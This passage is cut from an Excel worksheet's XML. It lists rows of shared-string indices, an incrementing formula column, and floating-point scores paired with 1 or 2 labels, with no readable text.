      <c r="E1802">
        <v>34.277988433837891</v>
      </c>
      <c r="F1802">
        <v>1</v>
      </c>
    </row>
    <row r="1803" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1803" t="s">
        <v>3478</v>
      </c>
      <c r="B1803" t="s">
        <v>3479</v>
      </c>
      <c r="C1803">
        <f t="shared" si="28"/>
        <v>11688094</v>
      </c>
      <c r="D1803" t="s">
        <v>3480</v>
      </c>
      <c r="E1803">
        <v>9.7759990692138672</v>
      </c>
      <c r="F1803">
        <v>2</v>
      </c>
    </row>
    <row r="1804" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1804" t="s">
        <v>3481</v>
      </c>
      <c r="B1804" t="s">
        <v>3482</v>
      </c>
      <c r="C1804">
        <f t="shared" si="28"/>
        <v>11689347</v>
      </c>
      <c r="D1804" t="s">
        <v>3483</v>
      </c>
      <c r="E1804">
        <v>12.502504348754879</v>
      </c>
      <c r="F1804">
        <v>1</v>
      </c>
    </row>
    <row r="1805" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1805" t="s">
        <v>3481</v>
      </c>
      <c r="B1805" t="s">
        <v>3482</v>
      </c>
      <c r="C1805">
        <f t="shared" si="28"/>
        <v>11690600</v>
      </c>
      <c r="D1805" t="s">
        <v>3484</v>
      </c>
      <c r="E1805">
        <v>8.1274328231811523</v>
      </c>
      <c r="F1805">
        <v>2</v>
      </c>
    </row>
    <row r="1806" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1806" t="s">
        <v>3485</v>
      </c>
      <c r="B1806" t="s">
        <v>3486</v>
      </c>
      <c r="C1806">
        <f t="shared" si="28"/>
        <v>11691853</v>
      </c>
      <c r="D1806" t="s">
        <v>3487</v>
      </c>
      <c r="E1806">
        <v>33.948326110839837</v>
      </c>
      <c r="F1806">
        <v>1</v>
      </c>
    </row>
    <row r="1807" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1807" t="s">
        <v>3485</v>
      </c>
      <c r="B1807" t="s">
        <v>3486</v>
      </c>
      <c r="C1807">
        <f t="shared" si="28"/>
        <v>11693106</v>
      </c>
      <c r="D1807" t="s">
        <v>3488</v>
      </c>
      <c r="E1807">
        <v>2.3199485149234529E-3</v>
      </c>
      <c r="F1807">
        <v>2</v>
      </c>
    </row>
    <row r="1808" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1808" t="s">
        <v>3489</v>
      </c>
      <c r="B1808" t="s">
        <v>3490</v>
      </c>
      <c r="C1808">
        <f t="shared" si="28"/>
        <v>11694359</v>
      </c>
      <c r="D1808" t="s">
        <v>3491</v>
      </c>
      <c r="E1808">
        <v>27.869638442993161</v>
      </c>
      <c r="F1808">
        <v>1</v>
      </c>
    </row>
    <row r="1809" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1809" t="s">
        <v>3489</v>
      </c>
      <c r="B1809" t="s">
        <v>3490</v>
      </c>
      <c r="C1809">
        <f t="shared" si="28"/>
        <v>11695612</v>
      </c>
      <c r="D1809" t="s">
        <v>3492</v>
      </c>
      <c r="E1809">
        <v>6.4679460525512704</v>
      </c>
      <c r="F1809">
        <v>2</v>
      </c>
    </row>
    <row r="1810" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1810" t="s">
        <v>3493</v>
      </c>
      <c r="B1810" t="s">
        <v>3494</v>
      </c>
      <c r="C1810">
        <f t="shared" si="28"/>
        <v>11696865</v>
      </c>
      <c r="D1810" t="s">
        <v>3495</v>
      </c>
      <c r="E1810">
        <v>23.019720077514648</v>
      </c>
      <c r="F1810">
        <v>1</v>
      </c>
    </row>
    <row r="1811" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1811" t="s">
        <v>3493</v>
      </c>
      <c r="B1811" t="s">
        <v>3494</v>
      </c>
      <c r="C1811">
        <f t="shared" si="28"/>
        <v>11698118</v>
      </c>
      <c r="D1811" t="s">
        <v>3496</v>
      </c>
      <c r="E1811">
        <v>7.9590128734707832E-3</v>
      </c>
      <c r="F1811">
        <v>2</v>
      </c>
    </row>
    <row r="1812" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1812" t="s">
        <v>3497</v>
      </c>
      <c r="B1812" t="s">
        <v>3498</v>
      </c>
      <c r="C1812">
        <f t="shared" si="28"/>
        <v>11699371</v>
      </c>
      <c r="D1812" t="s">
        <v>3499</v>
      </c>
      <c r="E1812">
        <v>23.644632339477539</v>
      </c>
      <c r="F1812">
        <v>1</v>
      </c>
    </row>
    <row r="1813" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1813" t="s">
        <v>3497</v>
      </c>
      <c r="B1813" t="s">
        <v>3498</v>
      </c>
      <c r="C1813">
        <f t="shared" si="28"/>
        <v>11700624</v>
      </c>
      <c r="D1813" t="s">
        <v>3500</v>
      </c>
      <c r="E1813">
        <v>13.24960994720459</v>
      </c>
      <c r="F1813">
        <v>2</v>
      </c>
    </row>
    <row r="1814" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1814" t="s">
        <v>3501</v>
      </c>
      <c r="B1814" t="s">
        <v>3502</v>
      </c>
      <c r="C1814">
        <f t="shared" si="28"/>
        <v>11701877</v>
      </c>
      <c r="D1814" t="s">
        <v>3503</v>
      </c>
      <c r="E1814">
        <v>27.554422378540039</v>
      </c>
      <c r="F1814">
        <v>1</v>
      </c>
    </row>
    <row r="1815" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1815" t="s">
        <v>3501</v>
      </c>
      <c r="B1815" t="s">
        <v>3502</v>
      </c>
      <c r="C1815">
        <f t="shared" si="28"/>
        <v>11703130</v>
      </c>
      <c r="D1815" t="s">
        <v>3504</v>
      </c>
      <c r="E1815">
        <v>0.71070986986160278</v>
      </c>
      <c r="F1815">
        <v>2</v>
      </c>
    </row>
    <row r="1816" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1816" t="s">
        <v>3505</v>
      </c>
      <c r="B1816" t="s">
        <v>3506</v>
      </c>
      <c r="C1816">
        <f t="shared" si="28"/>
        <v>11704383</v>
      </c>
      <c r="D1816" t="s">
        <v>3507</v>
      </c>
      <c r="E1816">
        <v>28.798578262329102</v>
      </c>
      <c r="F1816">
        <v>1</v>
      </c>
    </row>
    <row r="1817" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1817" t="s">
        <v>3505</v>
      </c>
      <c r="B1817" t="s">
        <v>3506</v>
      </c>
      <c r="C1817">
        <f t="shared" si="28"/>
        <v>11705636</v>
      </c>
      <c r="D1817" t="s">
        <v>3508</v>
      </c>
      <c r="E1817">
        <v>5.990234375</v>
      </c>
      <c r="F1817">
        <v>2</v>
      </c>
    </row>
    <row r="1818" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1818" t="s">
        <v>3509</v>
      </c>
      <c r="B1818" t="s">
        <v>3510</v>
      </c>
      <c r="C1818">
        <f t="shared" si="28"/>
        <v>11706889</v>
      </c>
      <c r="D1818" t="s">
        <v>3511</v>
      </c>
      <c r="E1818">
        <v>22.372406005859379</v>
      </c>
      <c r="F1818">
        <v>1</v>
      </c>
    </row>
    <row r="1819" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1819" t="s">
        <v>3509</v>
      </c>
      <c r="B1819" t="s">
        <v>3510</v>
      </c>
      <c r="C1819">
        <f t="shared" si="28"/>
        <v>11708142</v>
      </c>
      <c r="D1819" t="s">
        <v>3512</v>
      </c>
      <c r="E1819">
        <v>8.8568973541259766</v>
      </c>
      <c r="F1819">
        <v>2</v>
      </c>
    </row>
    <row r="1820" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1820" t="s">
        <v>3513</v>
      </c>
      <c r="B1820" t="s">
        <v>3514</v>
      </c>
      <c r="C1820">
        <f t="shared" si="28"/>
        <v>11709395</v>
      </c>
      <c r="D1820" t="s">
        <v>3515</v>
      </c>
      <c r="E1820">
        <v>32.763347625732422</v>
      </c>
      <c r="F1820">
        <v>1</v>
      </c>
    </row>
    <row r="1821" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1821" t="s">
        <v>3513</v>
      </c>
      <c r="B1821" t="s">
        <v>3514</v>
      </c>
      <c r="C1821">
        <f t="shared" si="28"/>
        <v>11710648</v>
      </c>
      <c r="D1821" t="s">
        <v>3516</v>
      </c>
      <c r="E1821">
        <v>2.3423953056335449</v>
      </c>
      <c r="F1821">
        <v>2</v>
      </c>
    </row>
    <row r="1822" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1822" t="s">
        <v>3517</v>
      </c>
      <c r="B1822" t="s">
        <v>3518</v>
      </c>
      <c r="C1822">
        <f t="shared" si="28"/>
        <v>11711901</v>
      </c>
      <c r="D1822" t="s">
        <v>3519</v>
      </c>
      <c r="E1822">
        <v>26.005643844604489</v>
      </c>
      <c r="F1822">
        <v>1</v>
      </c>
    </row>
    <row r="1823" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1823" t="s">
        <v>3517</v>
      </c>
      <c r="B1823" t="s">
        <v>3518</v>
      </c>
      <c r="C1823">
        <f t="shared" si="28"/>
        <v>11713154</v>
      </c>
      <c r="D1823" t="s">
        <v>3520</v>
      </c>
      <c r="E1823">
        <v>7.8286805152893066</v>
      </c>
      <c r="F1823">
        <v>2</v>
      </c>
    </row>
    <row r="1824" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1824" t="s">
        <v>3521</v>
      </c>
      <c r="B1824" t="s">
        <v>3522</v>
      </c>
      <c r="C1824">
        <f t="shared" si="28"/>
        <v>11714407</v>
      </c>
      <c r="D1824" t="s">
        <v>3377</v>
      </c>
      <c r="E1824">
        <v>36.838222503662109</v>
      </c>
      <c r="F1824">
        <v>1</v>
      </c>
    </row>
    <row r="1825" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1825" t="s">
        <v>3521</v>
      </c>
      <c r="B1825" t="s">
        <v>3522</v>
      </c>
      <c r="C1825">
        <f t="shared" si="28"/>
        <v>11715660</v>
      </c>
      <c r="D1825" t="s">
        <v>3523</v>
      </c>
      <c r="E1825">
        <v>8.04302978515625</v>
      </c>
      <c r="F1825">
        <v>2</v>
      </c>
    </row>
    <row r="1826" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1826" t="s">
        <v>3524</v>
      </c>
      <c r="B1826" t="s">
        <v>3525</v>
      </c>
      <c r="C1826">
        <f t="shared" si="28"/>
        <v>11716913</v>
      </c>
      <c r="D1826" t="s">
        <v>3526</v>
      </c>
      <c r="E1826">
        <v>21.780448913574219</v>
      </c>
      <c r="F1826">
        <v>1</v>
      </c>
    </row>
    <row r="1827" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1827" t="s">
        <v>3524</v>
      </c>
      <c r="B1827" t="s">
        <v>3525</v>
      </c>
      <c r="C1827">
        <f t="shared" si="28"/>
        <v>11718166</v>
      </c>
      <c r="D1827" t="s">
        <v>3527</v>
      </c>
      <c r="E1827">
        <v>8.7908782958984375</v>
      </c>
      <c r="F1827">
        <v>2</v>
      </c>
    </row>
    <row r="1828" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1828" t="s">
        <v>3528</v>
      </c>
      <c r="B1828" t="s">
        <v>3529</v>
      </c>
      <c r="C1828">
        <f t="shared" si="28"/>
        <v>11719419</v>
      </c>
      <c r="D1828" t="s">
        <v>3410</v>
      </c>
      <c r="E1828">
        <v>21.96272087097168</v>
      </c>
      <c r="F1828">
        <v>1</v>
      </c>
    </row>
    <row r="1829" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1829" t="s">
        <v>3528</v>
      </c>
      <c r="B1829" t="s">
        <v>3529</v>
      </c>
      <c r="C1829">
        <f t="shared" si="28"/>
        <v>11720672</v>
      </c>
      <c r="D1829" t="s">
        <v>3530</v>
      </c>
      <c r="E1829">
        <v>10.79426097869873</v>
      </c>
      <c r="F1829">
        <v>2</v>
      </c>
    </row>
    <row r="1830" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1830" t="s">
        <v>3531</v>
      </c>
      <c r="B1830" t="s">
        <v>3532</v>
      </c>
      <c r="C1830">
        <f t="shared" si="28"/>
        <v>11721925</v>
      </c>
      <c r="D1830" t="s">
        <v>3533</v>
      </c>
      <c r="E1830">
        <v>16.95475006103516</v>
      </c>
      <c r="F1830">
        <v>1</v>
      </c>
    </row>
    <row r="1831" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1831" t="s">
        <v>3531</v>
      </c>
      <c r="B1831" t="s">
        <v>3532</v>
      </c>
      <c r="C1831">
        <f t="shared" si="28"/>
        <v>11723178</v>
      </c>
      <c r="D1831" t="s">
        <v>3534</v>
      </c>
      <c r="E1831">
        <v>14.458651542663571</v>
      </c>
      <c r="F1831">
        <v>2</v>
      </c>
    </row>
    <row r="1832" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1832" t="s">
        <v>3535</v>
      </c>
      <c r="B1832" t="s">
        <v>3536</v>
      </c>
      <c r="C1832">
        <f t="shared" si="28"/>
        <v>11724431</v>
      </c>
      <c r="D1832" t="s">
        <v>3537</v>
      </c>
      <c r="E1832">
        <v>29.7982292175293</v>
      </c>
      <c r="F1832">
        <v>1</v>
      </c>
    </row>
    <row r="1833" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1833" t="s">
        <v>3535</v>
      </c>
      <c r="B1833" t="s">
        <v>3536</v>
      </c>
      <c r="C1833">
        <f t="shared" si="28"/>
        <v>11725684</v>
      </c>
      <c r="D1833" t="s">
        <v>3538</v>
      </c>
      <c r="E1833">
        <v>7.45574951171875</v>
      </c>
      <c r="F1833">
        <v>2</v>
      </c>
    </row>
    <row r="1834" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1834" t="s">
        <v>3539</v>
      </c>
      <c r="B1834" t="s">
        <v>3540</v>
      </c>
      <c r="C1834">
        <f t="shared" si="28"/>
        <v>11726937</v>
      </c>
      <c r="D1834" t="s">
        <v>3541</v>
      </c>
      <c r="E1834">
        <v>28.622468948364261</v>
      </c>
      <c r="F1834">
        <v>1</v>
      </c>
    </row>
    <row r="1835" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1835" t="s">
        <v>3539</v>
      </c>
      <c r="B1835" t="s">
        <v>3540</v>
      </c>
      <c r="C1835">
        <f t="shared" si="28"/>
        <v>11728190</v>
      </c>
      <c r="D1835" t="s">
        <v>3542</v>
      </c>
      <c r="E1835">
        <v>20.299211502075199</v>
      </c>
      <c r="F1835">
        <v>2</v>
      </c>
    </row>
    <row r="1836" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1836" t="s">
        <v>3543</v>
      </c>
      <c r="B1836" t="s">
        <v>3494</v>
      </c>
      <c r="C1836">
        <f t="shared" si="28"/>
        <v>11729443</v>
      </c>
      <c r="D1836" t="s">
        <v>3495</v>
      </c>
      <c r="E1836">
        <v>20.85392951965332</v>
      </c>
      <c r="F1836">
        <v>1</v>
      </c>
    </row>
    <row r="1837" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1837" t="s">
        <v>3543</v>
      </c>
      <c r="B1837" t="s">
        <v>3494</v>
      </c>
      <c r="C1837">
        <f t="shared" si="28"/>
        <v>11730696</v>
      </c>
      <c r="D1837" t="s">
        <v>3544</v>
      </c>
      <c r="E1837">
        <v>14.01188278198242</v>
      </c>
      <c r="F1837">
        <v>2</v>
      </c>
    </row>
    <row r="1838" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1838" t="s">
        <v>3545</v>
      </c>
      <c r="B1838" t="s">
        <v>3546</v>
      </c>
      <c r="C1838">
        <f t="shared" si="28"/>
        <v>11731949</v>
      </c>
      <c r="D1838" t="s">
        <v>3377</v>
      </c>
      <c r="E1838">
        <v>27.525934219360352</v>
      </c>
      <c r="F1838">
        <v>1</v>
      </c>
    </row>
    <row r="1839" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1839" t="s">
        <v>3545</v>
      </c>
      <c r="B1839" t="s">
        <v>3546</v>
      </c>
      <c r="C1839">
        <f t="shared" si="28"/>
        <v>11733202</v>
      </c>
      <c r="D1839" t="s">
        <v>3547</v>
      </c>
      <c r="E1839">
        <v>4.2061612475663418E-4</v>
      </c>
      <c r="F1839">
        <v>2</v>
      </c>
    </row>
    <row r="1840" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1840" t="s">
        <v>3548</v>
      </c>
      <c r="B1840" t="s">
        <v>3549</v>
      </c>
      <c r="C1840">
        <f t="shared" si="28"/>
        <v>11734455</v>
      </c>
      <c r="D1840" t="s">
        <v>3550</v>
      </c>
      <c r="E1840">
        <v>30.387460708618161</v>
      </c>
      <c r="F1840">
        <v>1</v>
      </c>
    </row>
    <row r="1841" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1841" t="s">
        <v>3548</v>
      </c>
      <c r="B1841" t="s">
        <v>3549</v>
      </c>
      <c r="C1841">
        <f t="shared" si="28"/>
        <v>11735708</v>
      </c>
      <c r="D1841" t="s">
        <v>3551</v>
      </c>
      <c r="E1841">
        <v>13.858614921569821</v>
      </c>
      <c r="F1841">
        <v>2</v>
      </c>
    </row>
    <row r="1842" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1842" t="s">
        <v>3552</v>
      </c>
      <c r="B1842" t="s">
        <v>3553</v>
      </c>
      <c r="C1842">
        <f t="shared" si="28"/>
        <v>11736961</v>
      </c>
      <c r="D1842" t="s">
        <v>3554</v>
      </c>
      <c r="E1842">
        <v>30.36599159240723</v>
      </c>
      <c r="F1842">
        <v>1</v>
      </c>
    </row>
    <row r="1843" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1843" t="s">
        <v>3552</v>
      </c>
      <c r="B1843" t="s">
        <v>3553</v>
      </c>
      <c r="C1843">
        <f t="shared" si="28"/>
        <v>11738214</v>
      </c>
      <c r="D1843" t="s">
        <v>3555</v>
      </c>
      <c r="E1843">
        <v>1.4791169166564939</v>
      </c>
      <c r="F1843">
        <v>2</v>
      </c>
    </row>
    <row r="1844" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1844" t="s">
        <v>3556</v>
      </c>
      <c r="B1844" t="s">
        <v>3557</v>
      </c>
      <c r="C1844">
        <f t="shared" si="28"/>
        <v>11739467</v>
      </c>
      <c r="D1844" t="s">
        <v>3558</v>
      </c>
      <c r="E1844">
        <v>30.183063507080082</v>
      </c>
      <c r="F1844">
        <v>1</v>
      </c>
    </row>
    <row r="1845" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1845" t="s">
        <v>3556</v>
      </c>
      <c r="B1845" t="s">
        <v>3557</v>
      </c>
      <c r="C1845">
        <f t="shared" si="28"/>
        <v>11740720</v>
      </c>
      <c r="D1845" t="s">
        <v>3559</v>
      </c>
      <c r="E1845">
        <v>11.86030960083008</v>
      </c>
      <c r="F1845">
        <v>2</v>
      </c>
    </row>
    <row r="1846" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1846" t="s">
        <v>3560</v>
      </c>
      <c r="B1846" t="s">
        <v>3561</v>
      </c>
      <c r="C1846">
        <f t="shared" si="28"/>
        <v>11741973</v>
      </c>
      <c r="D1846" t="s">
        <v>3562</v>
      </c>
      <c r="E1846">
        <v>13.66627788543701</v>
      </c>
      <c r="F1846">
        <v>1</v>
      </c>
    </row>
    <row r="1847" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1847" t="s">
        <v>3560</v>
      </c>
      <c r="B1847" t="s">
        <v>3561</v>
      </c>
      <c r="C1847">
        <f t="shared" si="28"/>
        <v>11743226</v>
      </c>
      <c r="D1847" t="s">
        <v>3563</v>
      </c>
      <c r="E1847">
        <v>0.30620256066322332</v>
      </c>
      <c r="F1847">
        <v>2</v>
      </c>
    </row>
    <row r="1848" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1848" t="s">
        <v>3564</v>
      </c>
      <c r="B1848" t="s">
        <v>3565</v>
      </c>
      <c r="C1848">
        <f t="shared" si="28"/>
        <v>11744479</v>
      </c>
      <c r="D1848" t="s">
        <v>3566</v>
      </c>
      <c r="E1848">
        <v>30.238821029663089</v>
      </c>
      <c r="F1848">
        <v>1</v>
      </c>
    </row>
    <row r="1849" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1849" t="s">
        <v>3564</v>
      </c>
      <c r="B1849" t="s">
        <v>3565</v>
      </c>
      <c r="C1849">
        <f t="shared" si="28"/>
        <v>11745732</v>
      </c>
      <c r="D1849" t="s">
        <v>3567</v>
      </c>
      <c r="E1849">
        <v>14.469192504882811</v>
      </c>
      <c r="F1849">
        <v>2</v>
      </c>
    </row>
    <row r="1850" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1850" t="s">
        <v>3568</v>
      </c>
      <c r="B1850" t="s">
        <v>3569</v>
      </c>
      <c r="C1850">
        <f t="shared" si="28"/>
        <v>11746985</v>
      </c>
      <c r="D1850" t="s">
        <v>3570</v>
      </c>
      <c r="E1850">
        <v>29.619110107421879</v>
      </c>
      <c r="F1850">
        <v>1</v>
      </c>
    </row>
    <row r="1851" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1851" t="s">
        <v>3568</v>
      </c>
      <c r="B1851" t="s">
        <v>3569</v>
      </c>
      <c r="C1851">
        <f t="shared" si="28"/>
        <v>11748238</v>
      </c>
      <c r="D1851" t="s">
        <v>3571</v>
      </c>
      <c r="E1851">
        <v>17.071565628051761</v>
      </c>
      <c r="F1851">
        <v>2</v>
      </c>
    </row>
    <row r="1852" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1852" t="s">
        <v>3572</v>
      </c>
      <c r="B1852" t="s">
        <v>3573</v>
      </c>
      <c r="C1852">
        <f t="shared" si="28"/>
        <v>11749491</v>
      </c>
      <c r="D1852" t="s">
        <v>3574</v>
      </c>
      <c r="E1852">
        <v>25.61713790893555</v>
      </c>
      <c r="F1852">
        <v>1</v>
      </c>
    </row>
    <row r="1853" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1853" t="s">
        <v>3572</v>
      </c>
      <c r="B1853" t="s">
        <v>3573</v>
      </c>
      <c r="C1853">
        <f t="shared" si="28"/>
        <v>11750744</v>
      </c>
      <c r="D1853" t="s">
        <v>3575</v>
      </c>
      <c r="E1853">
        <v>10.06610774993896</v>
      </c>
      <c r="F1853">
        <v>2</v>
      </c>
    </row>
    <row r="1854" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1854" t="s">
        <v>3576</v>
      </c>
      <c r="B1854" t="s">
        <v>3577</v>
      </c>
      <c r="C1854">
        <f t="shared" si="28"/>
        <v>11751997</v>
      </c>
      <c r="D1854" t="s">
        <v>3578</v>
      </c>
      <c r="E1854">
        <v>25.716115951538089</v>
      </c>
      <c r="F1854">
        <v>1</v>
      </c>
    </row>
    <row r="1855" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1855" t="s">
        <v>3576</v>
      </c>
      <c r="B1855" t="s">
        <v>3577</v>
      </c>
      <c r="C1855">
        <f t="shared" si="28"/>
        <v>11753250</v>
      </c>
      <c r="D1855" t="s">
        <v>3579</v>
      </c>
      <c r="E1855">
        <v>15.39590263366699</v>
      </c>
      <c r="F1855">
        <v>2</v>
      </c>
    </row>
    <row r="1856" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1856" t="s">
        <v>3580</v>
      </c>
      <c r="B1856" t="s">
        <v>3581</v>
      </c>
      <c r="C1856">
        <f t="shared" si="28"/>
        <v>11754503</v>
      </c>
      <c r="D1856" t="s">
        <v>3438</v>
      </c>
      <c r="E1856">
        <v>29.328800201416019</v>
      </c>
      <c r="F1856">
        <v>1</v>
      </c>
    </row>
    <row r="1857" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1857" t="s">
        <v>3580</v>
      </c>
      <c r="B1857" t="s">
        <v>3581</v>
      </c>
      <c r="C1857">
        <f t="shared" si="28"/>
        <v>11755756</v>
      </c>
      <c r="D1857" t="s">
        <v>3582</v>
      </c>
      <c r="E1857">
        <v>15.64105224609375</v>
      </c>
      <c r="F1857">
        <v>2</v>
      </c>
    </row>
    <row r="1858" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1858" t="s">
        <v>3583</v>
      </c>
      <c r="B1858" t="s">
        <v>3584</v>
      </c>
      <c r="C1858">
        <f t="shared" si="28"/>
        <v>11757009</v>
      </c>
      <c r="D1858" t="s">
        <v>3541</v>
      </c>
      <c r="E1858">
        <v>30.559518814086911</v>
      </c>
      <c r="F1858">
        <v>1</v>
      </c>
    </row>
    <row r="1859" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1859" t="s">
        <v>3583</v>
      </c>
      <c r="B1859" t="s">
        <v>3584</v>
      </c>
      <c r="C1859">
        <f t="shared" si="28"/>
        <v>11758262</v>
      </c>
      <c r="D1859" t="s">
        <v>3585</v>
      </c>
      <c r="E1859">
        <v>13.978359222412109</v>
      </c>
      <c r="F1859">
        <v>2</v>
      </c>
    </row>
    <row r="1860" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1860" t="s">
        <v>3586</v>
      </c>
      <c r="B1860" t="s">
        <v>3587</v>
      </c>
      <c r="C1860">
        <f t="shared" si="28"/>
        <v>11759515</v>
      </c>
      <c r="D1860" t="s">
        <v>3588</v>
      </c>
      <c r="E1860">
        <v>30.46759033203125</v>
      </c>
      <c r="F1860">
        <v>1</v>
      </c>
    </row>
    <row r="1861" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1861" t="s">
        <v>3586</v>
      </c>
      <c r="B1861" t="s">
        <v>3587</v>
      </c>
      <c r="C1861">
        <f t="shared" si="28"/>
        <v>11760768</v>
      </c>
      <c r="D1861" t="s">
        <v>3589</v>
      </c>
      <c r="E1861">
        <v>3.2853190898895259</v>
      </c>
      <c r="F1861">
        <v>2</v>
      </c>
    </row>
    <row r="1862" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1862" t="s">
        <v>3590</v>
      </c>
      <c r="B1862" t="s">
        <v>3591</v>
      </c>
      <c r="C1862">
        <f t="shared" si="28"/>
        <v>11762021</v>
      </c>
      <c r="D1862" t="s">
        <v>3434</v>
      </c>
      <c r="E1862">
        <v>25.632297515869141</v>
      </c>
      <c r="F1862">
        <v>1</v>
      </c>
    </row>
    <row r="1863" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1863" t="s">
        <v>3590</v>
      </c>
      <c r="B1863" t="s">
        <v>3591</v>
      </c>
      <c r="C1863">
        <f t="shared" si="28"/>
        <v>11763274</v>
      </c>
      <c r="D1863" t="s">
        <v>3592</v>
      </c>
      <c r="E1863">
        <v>9.9559135437011719</v>
      </c>
      <c r="F1863">
        <v>2</v>
      </c>
    </row>
    <row r="1864" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1864" t="s">
        <v>3593</v>
      </c>
      <c r="B1864" t="s">
        <v>3594</v>
      </c>
      <c r="C1864">
        <f t="shared" si="28"/>
        <v>11764527</v>
      </c>
      <c r="D1864" t="s">
        <v>3595</v>
      </c>
      <c r="E1864">
        <v>30.2452278137207</v>
      </c>
      <c r="F1864">
        <v>1</v>
      </c>
    </row>
    <row r="1865" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1865" t="s">
        <v>3593</v>
      </c>
      <c r="B1865" t="s">
        <v>3594</v>
      </c>
      <c r="C1865">
        <f t="shared" si="28"/>
        <v>11765780</v>
      </c>
      <c r="D1865" t="s">
        <v>3596</v>
      </c>
      <c r="E1865">
        <v>3.3594090491533279E-2</v>
      </c>
      <c r="F1865">
        <v>2</v>
      </c>
    </row>
    <row r="1866" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1866" t="s">
        <v>3597</v>
      </c>
      <c r="B1866" t="s">
        <v>3598</v>
      </c>
      <c r="C1866">
        <f t="shared" ref="C1866:C1929" si="29">C1865+1253</f>
        <v>11767033</v>
      </c>
      <c r="D1866" t="s">
        <v>3599</v>
      </c>
      <c r="E1866">
        <v>25.52115631103516</v>
      </c>
      <c r="F1866">
        <v>1</v>
      </c>
    </row>
    <row r="1867" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1867" t="s">
        <v>3597</v>
      </c>
      <c r="B1867" t="s">
        <v>3598</v>
      </c>
      <c r="C1867">
        <f t="shared" si="29"/>
        <v>11768286</v>
      </c>
      <c r="D1867" t="s">
        <v>3600</v>
      </c>
